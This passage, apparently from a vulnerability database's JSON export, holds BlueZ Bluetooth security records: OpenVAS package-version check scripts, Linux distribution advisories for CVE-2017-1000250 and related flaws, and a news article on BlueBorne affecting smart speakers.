ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-tools\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluetooth\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-hcidump\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-obexd\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-scripts\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:36:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9802", "CVE-2016-9800", "CVE-2016-9801", "CVE-2016-9917", "CVE-2016-9918", "CVE-2016-9798", "CVE-2016-9804"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192559", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192559", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-2559)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2559\");\n script_version(\"2020-01-23T13:06:24+0000\");\n script_cve_id(\"CVE-2016-9798\", \"CVE-2016-9800\", \"CVE-2016-9801\", \"CVE-2016-9802\", \"CVE-2016-9804\", \"CVE-2016-9917\", \"CVE-2016-9918\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:06:24 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:06:24 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-2559)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2559\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2559\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'bluez' package(s) announced via the EulerOS-SA-2019-2559 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In BlueZ 5.42, a buffer overflow was observed in 'commands_dump' function in 'tools/parser/csr.c' source file. The issue exists because 'commands' array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame 'frm-ptr' parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9804)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'pin_code_reply_dump' function in 'tools/parser/hci.c' source file. The issue exists because 'pin' array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame 'pin_code_reply_cp *cp' parameter.(CVE-2016-9800)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'read_n' function in 'tools/hcidump.c' source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9917)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'set_ext_ctrl' function in 'tools/parser/l2cap.c' source file when processing corrupted dump file.(CVE-2016-9801)\n\nIn BlueZ 5.42, a buffer over-read was identified in 'l2cap_packet' function in 'monitor/packet.c' source file. This issue can be triggered by processing a corrupted dump file and will result in btmon crash.(CVE-2016-9802)\n\nIn BlueZ 5.42, a use-after-free was identified in 'conf_opt' function in 'tools/parser/l2cap.c' source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9798)\n\nIn BlueZ 5.42, an out-of-bounds read was identified in 'packet_hexdump' function in 'monitor/packet.c' source file. This issue can be triggered by processing a corrupted dump file and will result in btmon crash.(CVE-2016-9918)\");\n\n script_tag(name:\"affected\", value:\"'bluez' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.h3\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.h3\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-27T18:35:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9802", "CVE-2016-9800", "CVE-2016-9801", "CVE-2016-9917", "CVE-2016-9918", "CVE-2016-9798", "CVE-2016-9804"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192380", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-2380)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2380\");\n script_version(\"2020-01-23T12:52:24+0000\");\n script_cve_id(\"CVE-2016-9798\", \"CVE-2016-9800\", \"CVE-2016-9801\", \"CVE-2016-9802\", \"CVE-2016-9804\", \"CVE-2016-9917\", \"CVE-2016-9918\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:52:24 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:52:24 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-2380)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2380\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2380\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'bluez' package(s) announced via the EulerOS-SA-2019-2380 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In BlueZ 5.42, a use-after-free was identified in 'conf_opt' function in 'tools/parser/l2cap.c' source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9798)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'pin_code_reply_dump' function in 'tools/parser/hci.c' source file. The issue exists because 'pin' array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame 'pin_code_reply_cp *cp' parameter.(CVE-2016-9800)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'set_ext_ctrl' function in 'tools/parser/l2cap.c' source file when processing corrupted dump file.(CVE-2016-9801)\n\nIn BlueZ 5.42, a buffer over-read was identified in 'l2cap_packet' function in 'monitor/packet.c' source file. This issue can be triggered by processing a corrupted dump file and will result in btmon crash.(CVE-2016-9802)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'commands_dump' function in 'tools/parser/csr.c' source file. The issue exists because 'commands' array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame 'frm-ptr' parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9804)\n\nIn BlueZ 5.42, a buffer overflow was observed in 'read_n' function in 'tools/hcidump.c' source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.(CVE-2016-9917)\n\nIn BlueZ 5.42, an out-of-bounds read was identified in 'packet_hexdump' function in 'monitor/packet.c' source file. This issue can be triggered by processing a corrupted dump file and will result in btmon crash.(CVE-2016-9918)\");\n\n script_tag(name:\"affected\", value:\"'bluez' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:35:41", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2685\n\n\nThe bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-September/034569.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-September/034573.html\n\n**Affected packages:**\nbluez\nbluez-alsa\nbluez-compat\nbluez-cups\nbluez-gstreamer\nbluez-hid2hci\nbluez-libs\nbluez-libs-devel\n\n**Upstream details at:**\n", "edition": 4, "modified": "2017-09-13T21:18:50", "published": "2017-09-12T23:15:38", "href": "http://lists.centos.org/pipermail/centos-announce/2017-September/034569.html", "id": "CESA-2017:2685", "title": "bluez security update", "type": "centos", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "Arch Linux Security Advisory ASA-201709-3\n=========================================\n\nSeverity: High\nDate : 2017-09-12\nCVE-ID : CVE-2017-1000250\nPackage : bluez\nType : information disclosure\nRemote : Yes\nLink : https://security.archlinux.org/AVG-396\n\nSummary\n=======\n\nThe package bluez before version 5.46-2 is vulnerable to information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 5.46-2.\n\n# pacman -Syu \"bluez>=5.46-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nAn information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys.\n\nImpact\n======\n\nA remote attacker is able to use a specially crafted Bluetooth device\nto obtain sensitive information such as Bluetooth encryption keys.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/55603\nhttps://www.armis.com/blueborne/\nhttp://pkgs.fedoraproject.org/cgit/rpms/bluez.git/plain/0010-Out-of-bounds-heap-read-in-service_search_attr_req-f.patch\nhttps://security.archlinux.org/CVE-2017-1000250", "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "id": "ASA-201709-3", "href": "https://security.archlinux.org/ASA-201709-3", "type": "archlinux", "title": "[ASA-201709-3] bluez: information disclosure", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:12", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "New bluez packages are available for Slackware 13.1, 13.37, 14.0, 14.1, 14.2,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/bluez-5.47-i586-1_slack14.2.txz: Upgraded.\n Fixed an information disclosure vulnerability which allows remote attackers\n to obtain sensitive information from the bluetoothd process memory. This\n vulnerability lies in the processing of SDP search attribute requests.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000250\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bluez-4.64-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bluez-4.64-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bluez-4.91-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bluez-4.91-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bluez-4.99-i486-3_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bluez-4.99-x86_64-3_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bluez-4.99-i486-4_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bluez-4.99-x86_64-4_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/bluez-5.47-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/bluez-5.47-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bluez-5.47-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bluez-5.47-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 package:\nc34a144a27aecf012ae0f6d4e9d23ec7 bluez-4.64-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n00fdad5615839cb6846780890ecd473d bluez-4.64-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\n0b24842a0c3e6b19bdd45705a155f82f bluez-4.91-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n01ec2415e62f36ba954ad18316089963 bluez-4.91-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\neadceb46961b159ea4580c65f37e1bb3 bluez-4.99-i486-3_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n7a8c9f38fbfca7c8dd35997dbe1e6da2 bluez-4.99-x86_64-3_slack14.0.txz\n\nSlackware 14.1 package:\n51a0d2992312419dfcdce2335635d613 bluez-4.99-i486-4_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n9b1016510c7292343e81263bee3f6710 bluez-4.99-x86_64-4_slack14.1.txz\n\nSlackware 14.2 package:\n7ee07b8ee57a8272703bcc706d148d75 bluez-5.47-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n0a28a8a20122ee46d3ebeb68450d139d bluez-5.47-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n230c704d9f97690c8eee0bb32aed2c50 n/bluez-5.47-i586-1.txz\n\nSlackware x86_64 -current package:\n2d4d0f25675d824f445c0fbd74c453ee n/bluez-5.47-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bluez-5.47-i586-1_slack14.2.txz", "modified": "2017-09-15T20:16:56", "published": "2017-09-15T20:16:56", "id": "SSA-2017-258-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.505994", "type": "slackware", "title": "[slackware-security] bluez", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:05:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "[4.66-2]\n- sdpd heap fixes\nResolves: #1490008", "edition": 6, "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "ELSA-2017-2685", "href": "http://linux.oracle.com/errata/ELSA-2017-2685.html", "title": "bluez security update", "type": "oraclelinux", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntu": [{"lastseen": "2020-07-02T11:42:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "It was discovered that an information disclosure vulnerability existed \nin the Service Discovery Protocol (SDP) implementation in BlueZ. A \nphysically proximate unauthenticated attacker could use this to \ndisclose sensitive information. (CVE-2017-1000250)", "edition": 5, "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "id": "USN-3413-1", "href": "https://ubuntu.com/security/notices/USN-3413-1", "title": "BlueZ vulnerability", "type": "ubuntu", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-02T11:39:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7837", "CVE-2020-0556"], "description": "It was discovered that BlueZ incorrectly handled bonding HID and HOGP \ndevices. A local attacker could possibly use this issue to impersonate \nnon-bonded devices. (CVE-2020-0556)\n\nIt was discovered that BlueZ incorrectly handled certain commands. A local \nattacker could use this issue to cause BlueZ to crash, resulting in a \ndenial of service, or possibly execute arbitrary code. This issue only \naffected Ubuntu 16.04 LTS. (CVE-2016-7837)", "edition": 2, "modified": "2020-03-30T00:00:00", "published": "2020-03-30T00:00:00", "id": "USN-4311-1", "href": "https://ubuntu.com/security/notices/USN-4311-1", "title": "BlueZ vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "Utilities for use in Bluetooth applications: \t- hcitool \t- hciattach \t- hciconfig \t- bluetoothd \t- l2ping \t- rfcomm \t- sdptool \t- bccmd \t- bluetoothctl \t- btmon \t- hcidump \t- l2test \t- rctest \t- gatttool \t- start scripts (Red Hat) \t- pcmcia configuration files The BLUETOOTH trademarks are owned by Bluetooth SIG, Inc., U.S.A. ", "modified": "2017-09-30T07:32:32", "published": "2017-09-30T07:32:32", "id": "FEDORA:2F41461DF302", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: bluez-5.46-6.fc27", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "Utilities for use in Bluetooth applications: \t- hcitool \t- hciattach \t- hciconfig \t- bluetoothd \t- l2ping \t- rfcomm \t- sdptool \t- bccmd \t- bluetoothctl \t- btmon \t- hcidump \t- l2test \t- rctest \t- gatttool \t- start scripts (Red Hat) \t- pcmcia configuration files The BLUETOOTH trademarks are owned by Bluetooth SIG, Inc., U.S.A. ", "modified": "2017-09-13T22:26:43", "published": "2017-09-13T22:26:43", "id": "FEDORA:211166075B57", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: bluez-5.46-6.fc26", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "jvn": [{"lastseen": "2019-05-29T19:49:10", "bulletinFamily": "info", "cvelist": ["CVE-2016-7837"], "description": "\n ## Description\n\nBlueZ provides a Bluetooth protocol stack for Linux kernel and userland utilities. \n`parse_line()` function used in some userland utilities contains a buffer overflow vulnerability.\n\n ## Impact\n\nAn attacker who can access the product may execute arbitrary code.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * BlueZ 5.41 and earlier\n", "edition": 5, "modified": "2016-12-22T00:00:00", "published": "2016-12-22T00:00:00", "id": "JVN:38755305", "href": "http://jvn.jp/en/jp/JVN38755305/index.html", "title": "JVN#38755305: BlueZ userland utilities vulnerable to buffer overflow", "type": "jvn", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T10:06:57", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0785", "CVE-2017-1000251"], "description": "[![amazon-alexa-hacking-bluetooth](https://3.bp.blogspot.com/-o2j3I7E5YEc/Wg1NXN0UwCI/AAAAAAAAuwo/OdiSuaq6xcAqy96SVehGkhc_VYMGX7gfgCLcBGAs/s1600/amazon-alexa-hacking-bluetooth.png)](<https://3.bp.blogspot.com/-o2j3I7E5YEc/Wg1NXN0UwCI/AAAAAAAAuwo/OdiSuaq6xcAqy96SVehGkhc_VYMGX7gfgCLcBGAs/s1600/amazon-alexa-hacking-bluetooth.png>)\n\nRemember BlueBorne? \n \nA series of recently disclosed [critical Bluetooth flaws](<https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html>) that affect billions of Android, iOS, Windows and Linux devices have now been discovered in millions of AI-based voice-activated personal assistants, including **Google Home** and **Amazon Echo**. \n \nAs estimated during the discovery of this devastating threat, several IoT and smart devices whose operating systems are often updated less frequently than smartphones and desktops are also vulnerable to BlueBorne. \n \nBlueBorne is the name given to the sophisticated attack exploiting a total of eight Bluetooth implementation vulnerabilities that allow attackers within the range of the targeted devices to run malicious code, steal sensitive information, take complete control, and launch man-in-the-middle attacks. \n \n**What's worse? **Triggering the [BlueBorne exploit](<https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html>) doesn't require victims to click any link or open any file\u2014all without requiring user interaction. Also, most security products would likely not be able to detect the attack. \n \nWhat's even scarier is that once an attacker gains control of one Bluetooth-enabled device, he/she can infect any or all devices on the same network. \n \nThese Bluetooth vulnerabilities were patched by Google for Android in September, [Microsoft for Windows](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>) in July, Apple for iOS one year before disclosure, and Linux distributions also shortly after disclosure. \n \nHowever, many of these 5 billion devices are still unpatched and open to attacks via these flaws. \n \n\n\n### 20 Million Amazon Echo & Google Home Devices Vulnerable to BlueBorne Attacks\n\nIoT security firm Armis, who initially discovered this issue, has now [disclosed](<https://www.armis.com/blueborne-cyber-threat-impacts-amazon-echo-google-home/>) that an estimated 20 million Amazon Echo and Google Home devices are also vulnerable to attacks leveraging the BlueBorne vulnerabilities. \n \nIf I split, around 15 million Amazon Echo and 5 million Google Home devices sold across the world are potentially at risk from BlueBorne. \n \nAmazon Echo is affected by the following two vulnerabilities: \n\n\n * A remote code execution vulnerability in the Linux kernel (CVE-2017-1000251)\n * An information disclosure flaw in the SDP server (CVE-2017-1000250)\nSince different Echo's variants use different operating systems, other Echo devices are affected by either the vulnerabilities found in Linux or Android. \n \nWhereas, Google Home devices are affected by one vulnerability: \n\n\n * Information disclosure vulnerability in Android's Bluetooth stack (CVE-2017-0785)\nThis Android flaw can also be exploited to cause a denial-of-service (DoS) condition. \n \nSince Bluetooth cannot be disabled on either of the voice-activated personal assistants, attackers within the range of the affected device can easily launch an attack. \n \nArmis has also published a proof-of-concept (PoC) video showing how they were able to hack and manipulate an Amazon Echo device. \n \nThe security firm notified both Amazon and Google about its findings, and both companies have released patches and issued automatic updates for the Amazon Echo and Google Home that fixes the BlueBorne attacks. \n \nAmazon Echo customers should confirm that their device is running v591448720 or later, while Google has not made any information regarding its version yet.\n", "modified": "2017-11-16T08:43:47", "published": "2017-11-15T21:43:00", "id": "THN:4141386ABD9B9D1290E4A6EAD271B02B", "href": "https://thehackernews.com/2017/11/amazon-alexa-hacking-bluetooth.html", "type": "thn", "title": "Bluetooth Hack Affects 20 Million Amazon Echo and Google Home Devices", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-1000251", "CVE-2017-8628", "CVE-2017-0783", "CVE-2017-0782"], "description": 